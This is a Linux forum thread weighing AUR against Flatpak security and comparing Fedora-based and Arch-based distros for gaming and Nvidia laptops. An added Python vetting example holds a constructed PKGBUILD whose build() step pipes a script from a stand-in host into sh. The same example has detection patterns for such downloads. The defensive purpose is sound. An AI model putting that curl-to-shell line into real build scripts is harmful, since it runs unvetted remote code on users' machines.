Fedora with native + flatpak packages, CachyOS with native + AUR packages

How safe is using the AUR compared to Flatpak? I’m a long-time CachyOS user and recently found that many Linux apps I’ve come across aren’t popular in the AUR. Should I still download them from the AUR, or is it better to use Flatpak in such cases? After all, Flatpak has both officially supported and community-maintained apps. I’ve never actually checked the PKGBUILDs for AUR software; if an app was popular, I just downloaded what I needed. Is there a risk of getting something malicious on my PC this way?

Does anyone here have experience with Fedora or Arch distros? Which do you find more stable, faster, and generally prefer? Do you use Flatpak or the AUR? I’ve heard some Fedora users go with native packages + Flatpak, while Arch users often use native + AUR, or sometimes Flatpak.

1 Like

Is there a risk of getting something malicious on my PC this way?

Yes. There is always a risk of getting malware or outdated packages from the AUR. Thankfully, your AUR helper (like yay) will notify you if the package is outdated most of the time.

The same can be said for community-maintained flatpaks as well, so this is not a case of either Flatpaks or the AUR being better than the other. It’s up to you to do the due diligence needed to vet the packages.

Does anyone here have experience with Fedora or Arch distros? Which do you find more stable, faster, and generally prefer? Do you use Flatpak or the AUR? I’ve heard some Fedora users go with native packages + Flatpak, while Arch users often use native + AUR, or sometimes Flatpak.

Naturally, Fedora is more stable than Arch since updates are less bleeding-edge. The best thing about Arch is the control it gives over your system. So, if I for some reason want a flatpak, I can easily install it on any system, including Arch. The only reason people tend to associate flatpaks with Fedora is that it is the most recommended way of installing software on Fedora’s Atomic distributions (i.e. Silverblue, Bazzite, Kinoite). Otherwise, most regular users of Fedora rely on its built-in package manager.

4 Likes

So, on Fedora KDE or Workstation, is it better to use a mix of native packages and Flatpaks? Or is it feasible to rely solely on Flatpaks?

Native packages for web browsers and Flatpaks for everything else.

2 Likes

So, would you say Fedora KDE/Workstation is stable and hardly ever breaks? Also, I’ve often seen people recommend installing native OS packages first, unlike Flatpaks, because they’re supposedly highly optimized for the system, smaller, and perform better. Is it really recommended to install everything via Flatpak on Fedora, though?

Could only say this about Silverblue and Aeon because of their self-healing capabilities.

Yes, except for web browsers, you should install them natively.

2 Likes

Is it even better to install Steam as a flatpak?

In terms of both security and reliability/stability, I’d choose Flatpaks from Flathub over the AUR.

The AUR can be convenient for experienced, DIY-motivated users (particularly in the context of Arch, where the official repos are quite small/limited compared to other distros), but for average users or anyone who wants to just use an OS casually, it’s a rather insecure/non-ideal model, since the security of the model depends on users reading PKGBUILD files and doing their own vetting and due diligence (which most users don’t do).

Outright maliciousness is just one risk to consider. You aren’t just trusting random people not to be malicious, you are also trusting them to be semi-competent and semi-reliable and not negligent or irresponsible, and trusting that an AUR package won’t become outdated or abandoned or cause conflicts, etc.

Should I still download them from the AUR, or is it better to use Flatpak in such cases?

In my eyes, if you don’t mind consistently vetting software yourself, the AUR is pretty cool, but if you aren’t vetting the software yourself, the AUR should be pretty far down your order of preference, if not close to a method of last resort.

If there is an official flatpak available, I’d definitely choose that. If there is an unofficial flatpak on Flathub available, I’d still probably prefer that to the AUR, since inclusion on Flathub implies at least some basic initial vetting was done by Flathub volunteers, and due to flatpak’s intrinsic sandboxing capabilities. Like the AUR, it’s also possible to vet flatpaks yourself to some degree (the flatpak equivalent of a PKGBUILD is the flatpak manifest).

So, on Fedora KDE or Workstation, is it better to use a mix of native packages and Flatpaks? Or is it feasible to rely solely on Flatpaks?

It is not feasible to rely solely on flatpaks with a traditional Fedora install (since the base system is made up of roughly 2000 traditional packages). But it may be possible to rely only on flatpaks for the software you install/add post-install. If you want to maximize your use of flatpaks, I think the Fedora Atomic distros are a sensible option, but I’d personally prefer official Fedora RPM packages to unofficial flatpaks in most cases.

4 Likes
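The two kinds of self-vetting mentioned above, reading a PKGBUILD before building from the AUR and reading the finish-args of a flatpak manifest, as an added Python example that is not part of this thread and not tooling from Arch, Flathub or any distro. The PKGBUILD text and the finish-args list are constructed for illustration; the checks are heuristics that point at where to read more carefully, not a verdict on a package.

```python
import re

# Constructed PKGBUILD for illustration; not a real AUR package.
PKGBUILD = """\
pkgname=example-tool
url="https://github.com/example/example-tool"
source=("$url/archive/v1.2.0.tar.gz"
        "https://cdn.unrelated-host.example/helper.sh")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'SKIP')
build() {
  curl -s https://cdn.unrelated-host.example/setup.sh | sh
  make
}
"""
HOST = r'https?://([^/\s"\')]+)'  # captures the hostname of a literal URL

def vet_pkgbuild(text):
    # Heuristic findings that prompt a closer read; they are not proof of anything.
    findings = []
    m = re.search(r'^url=["\']?' + HOST, text, re.M)
    upstream = m.group(1) if m else None
    # 1. A SKIP checksum means makepkg does not integrity-check that source.
    sums = re.search(r'^\w*sums=\((.*?)\)', text, re.M | re.S)
    if sums and 'SKIP' in sums.group(1):
        findings.append("checksum SKIP: a source is not integrity-checked")
    # 2. Sources hosted somewhere other than the declared upstream deserve a closer look.
    src = re.search(r'^source=\((.*?)\)', text, re.M | re.S)
    for host in re.findall(HOST, src.group(1) if src else ''):
        if upstream and host != upstream:
            findings.append(f"source from non-upstream host: {host}")
    # 3. Network fetches inside prepare()/build()/package() bypass the checksum step.
    for fn in ('prepare', 'build', 'package'):
        body = re.search(rf'^{fn}\(\)\s*\{{(.*?)^\}}', text, re.M | re.S)
        if body and re.search(r'\b(curl|wget)\b', body.group(1)):
            findings.append(f"{fn}() downloads at build time, outside the checksums")
    return findings

# Constructed finish-args as they appear in a flatpak manifest; not a real app's manifest.
FINISH_ARGS = ["--socket=wayland", "--filesystem=home", "--talk-name=org.freedesktop.Flatpak"]

# Real Flatpak permissions that largely neutralise the sandbox.
BROAD_PERMISSIONS = {
    "--filesystem=host": "read/write access to the whole host filesystem",
    "--filesystem=home": "read/write access to your home directory",
    "--talk-name=org.freedesktop.Flatpak": "can run commands outside the sandbox",
}

def vet_finish_args(args):
    # Map each sandbox-weakening finish-arg to why it matters.
    return {a: BROAD_PERMISSIONS[a] for a in args if a in BROAD_PERMISSIONS}
```

Run `vet_pkgbuild(PKGBUILD)` and `vet_finish_args(FINISH_ARGS)` on the constructed inputs to see the three PKGBUILD findings and the two broad permissions; on a clean package both return empty.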

Yep.

Thank you very much for such a detailed answer. What do you say about the Nobara and Bazzite distributions for games, or is it better to install Fedora Workstation/KDE, customize it and use that, because I think it would be more reliable than using a spin?

Or can a system that is made by a small team not be safe, stable and well tested? If it’s used as a universal system, sometimes for games. I have a laptop with an Nvidia card.

A hint please: on a laptop with an Nvidia graphics card, is Gnome more polished than KDE in Fedora?

Personally, unless maybe it’s a system intended solely or primarily for gaming, the small amount of potential convenience or the hypothetical small edge in performance of a “gaming” distro isn’t really a large enough reason for me to choose a distro like that over a solid general purpose distro like Fedora or OpenSUSE. A possible exception would be Bazzite, since I’m attracted to its atomic nature, and have a generally positive opinion of Universal Blue as a project broadly. As I see it, the main benefit to a “gaming” distro is convenience if you want a gaming oriented OS out of the box, but that could come at the expense of other priorities, so to me, it is rarely worth it.

With that said, if I were to take off my privacy/security hat, and put on my Linux hobbyist hat, I’d say that part of the fun and part of the learning experience of Linux is trying out the things that interest you, trying various distros, breaking things, fixing things, experimenting. It’s part of the process and part of the fun. And if I were to choose a “gaming” distro, the two you mentioned are probably the only two I’d consider.

A hint please: on a laptop with an Nvidia graphics card, is Gnome more polished than KDE in Fedora?

Personally, I think that Gnome is just generally more polished than KDE regardless of hardware (KDE’s comparative advantage is its flexibility and customizability). I do not have a laptop with an Nvidia GPU, nor have I used Fedora KDE outside of a VM, so I can’t directly answer your question. With Nvidia, I’ve found Pop!_OS to be fairly hassle free, and I’d expect that would remain true for laptops with Nvidia GPUs since System76 (the developers of Pop!_OS) sell many laptops with Nvidia graphics.

1 Like

I heard CachyOS runs best on Nvidia right now, or is that not true? And that Fedora as well as openSUSE don’t like Nvidia, that they supposedly run best on AMD, or is that not true? Is there a difference between how Gnome or KDE runs on Fedora with Nvidia?

And that Fedora as well as openSUSE don’t like Nvidia, that they supposedly run best on AMD, or is that not true?

My understanding is that AMD drivers are open source and included in the Linux Kernel. Regardless of the distro you choose, AMD tends to be less problematic than Nvidia’s proprietary drivers (though Nvidia has been making some positive steps more recently).

And that Fedora as well as openSUSE don’t like Nvidia,

Not sure what is meant by that. My best guess is that it is a misinterpretation of something like “Fedora and OpenSUSE don’t like closed source software” and don’t pre-install closed source software like the Nvidia driver by default.

You must install the drivers manually, but realistically, that is mostly just a small difference in convenience, not performance or capability. Also worth noting that both of the gaming oriented distros you mentioned earlier (Nobara and Bazzite) deliberately chose to build on Fedora.

I don’t know, I don’t have any firsthand (or secondhand) knowledge about that. But I assume if there is substantial truth to it, there would be publicly available empirical evidence and specifics to support the claim, and whatever innovation would eventually be upstreamed or adopted by other distros (if it were a substantial improvement and didn’t have negative tradeoffs).

In my experience, at any given moment there are usually a few distros getting hype for being “optimized for gaming” or “optimized for Nvidia” or being theoretically “faster”. Any differences are usually modest and often not very perceivable or impactful in practice, and these ‘flavor of the month’ distros rise and fall in popularity/hype every few years. Maybe I’m just being a little too jaded, but I tend to tune out the ‘flavor of the month’ distros and circle back to them if they are still around and relevant once the hype subsides. I’ve kind of perceived Cachy to be in that category, but I could be dead wrong about that; it isn’t something I’ve looked into, just an unformed impression. It’s definitely a generalization, and for every generalization there will be exceptions. So take my impression with a grain of salt.

If you want to try a few different distros and see what works for you on your own hardware, Ventoy is a useful tool that makes that easier. In my eyes, experimenting and exploring is a big part of what makes Linux fun.

1 Like